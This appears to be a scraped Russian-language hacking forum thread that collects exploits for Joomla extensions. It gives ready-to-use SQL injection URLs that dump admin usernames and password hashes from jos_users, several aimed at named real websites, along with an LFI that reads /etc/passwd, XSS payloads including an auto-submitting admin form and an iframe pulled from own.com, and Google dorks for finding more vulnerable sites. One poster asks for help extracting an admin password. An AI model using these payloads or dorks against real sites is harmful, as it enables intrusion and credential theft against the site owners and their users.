XSS vulnerability in JComments Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние Уведомление JoomlaTune.com: 4 Мая 2010 Тип уязвимости: XSS Статус: исправлено JoomlaTune.com Степень опасности: Средний Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков. Атакующий может использовать браузер для проведения атаки: Code: <form method="POST" action="http://joomla/administrator/index.php" name="main"> <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="comment" value="comment text"> <input type="hidden" name="published" value="1"> <input type="hidden" name="option" value="com_jcomments"> <input type="hidden" name="id" value="1"> <input type="hidden" name="task" value="save"> </form> <script> document.main.submit(); </script> Решение: обновление к более поздней версии (c)http://securityvulns.ru/Xdocument887.html
com_elite_experts исходников не нашел Expl: Code: index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+ Example: Code: http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+ Dopk: Code: inurl:"option=com_elite_experts" //Вроде не боян...
joomla image_com Blind Sql Injection Dork Code: inurl:"com_image" Code Code: site/patch/index.php?option=com_image&view=[sqli] site/patch/index.php?option=com_image&Itemid=87&gallery=[sqli] site/patch/index.php?option=com_image&view=image&Itemid=[sqli] site/patch/index.php?option=com_image&page=[sqli] © Inj3ct0r.com [2010-06-14]
Joomla Component com_feedpost XSS vulnerability Dork Code: inurl:"feedpost.php?url=" XSS EXPLOIT Code: [COLOR=Cyan][B]HTML INJECTION:[/B][/COLOR] <iframe src=http://own.com/lol.html < [COLOR=Cyan][B]ALERT XSS:[/B][/COLOR] <body onload=alert('xss')> [COLOR=Cyan][B]GENERAL XSS:[/B][/COLOR] <body onload=JAVASCRIP_HERE> VULN IN HERE Code: http://localhost/joomla/components/com_feedpostold/feedpost.php?url=[XSS] Code: [COLOR=Cyan][B]Examples:[/B][/COLOR] http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<iframe src=http://own.com/lol.html < http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<body onload=alert('Inj3ct0r.com')> © Inj3ct0r.com
Joomla Component com_content blind SQL-Injection vulnerability Version: -- Exploit: Code: index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false Example: Code: http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false
.:[melkiy]:. Так не пойдёт com_content это стандартный компонент, тоесть если-бы там была SQL считай что ты похекал интырнеты. Так что просто и без кода ненадо. Или разбирайся почему на сайте работает, или давай код и версию. Там старенькая на сайте версия, но учитывая популярность я на 99% уверен, что не могли такой баг пропустить в двиге, тем более в параметре ID
1.5.0 Release Candidate 3 [LFI] версию можно посмотреть двумя способами: 1)в файле configuration.php-dist: @version $Id: configuration.php-dist 14401 2010-01-26 14:10:00Z louis $ 2)в хтмл исходниках админки: http://www.site.com/administrator/ <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> теперь об уязвимости: уязвимая функция require_once в компоненте com_jesubmit&view=,возможно провести LFI, конструкция: Code: http://www.site.com/index.php?option=com_jesubmit&view=[LFI%00] пример: Code: http://www.hillsborofreepress.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
Joomla Component com_phocagallery SQL injection Vulnerability Народ кто подскажет как раскрутить эту SQL - нужно выудить пасс админа. Спасибо!
Keltos - да, понимаю, просто пока я не столь подкован чтобы раскрутить самостоятельно SQL inj. - попросил помощи(составить запрос к SQL).
Code: Joomla Component com_phocagallery SQL injection Vulnerability сомнительная уязвимость, учитывая, что Code: $Itemid = JRequest::getInt( 'Itemid');
Наверное надо оживить тему?-) Компонент: com_storedirectory Тип: Sql-Inj Уязвимость в параметре id: PoC: http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1+union+select+1,2,concat%28username,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--
Joomla 1.5-xx com_congratulations index.php?option=com_congratulations&Itemid=1&task=date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1)),0x71),0x71)-- http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task=date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,password)+FROM+jos_users+limit+1,1)),0x71),0x71)--
SQL inj в компоненте com_jeformcr Доброго времени суток SQl-Inj в com_jeformcr Уязвимый параметр: id Подбор кол-ва колонок через order+by PoC: http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+where+usertype='Super%20Administrator'-- http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users+where+usertype='Super%20Administrator'--
Уязвимость: SQL Injection Vulnerability Компонент: com_idoblog Dork: inurl:"com_idoblog" Language: php http://extensions.joomla.org/extensions/news-production/blog/9218 Exploit: http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Уязвимость: Blind SQL Injection Vulnerability Компонент: allCineVid Dork: inurl:"com_allcinevid" Language: php http://www.joomtraders.com Exploit: http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=1 http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=0
Уязвимость: Multiple SQL Injection Vulnerability Компонент: Portfolio Dork: inurl:"com_allcinevid" Language: php http://www.salvatorefresta.net Exploit: http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
Joomla active XSS JFilterInput Наличие эксплоита: Да Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной фильтрацией входных данных в классе JFilterInput. В версии 1.6, к примеру, можно проверить при включенном модуле Userrofile, вбив в поле About Me следующий код: Code: <img src="<img src=x"/onerror=alert(1)//"> В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
(com_jce) BLIND sql injection vulnerability Description: JCE makes creating and editing Joomla!® content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... exploit & p0c [!] index.php?option=com_jce&Itemid=[valid Itemid] Example p0c [!] http://host/index.php?option=com_jce&Itemid=8 <= True [!] http://host/index.php?option=com_jce&Itemid=-8 <= False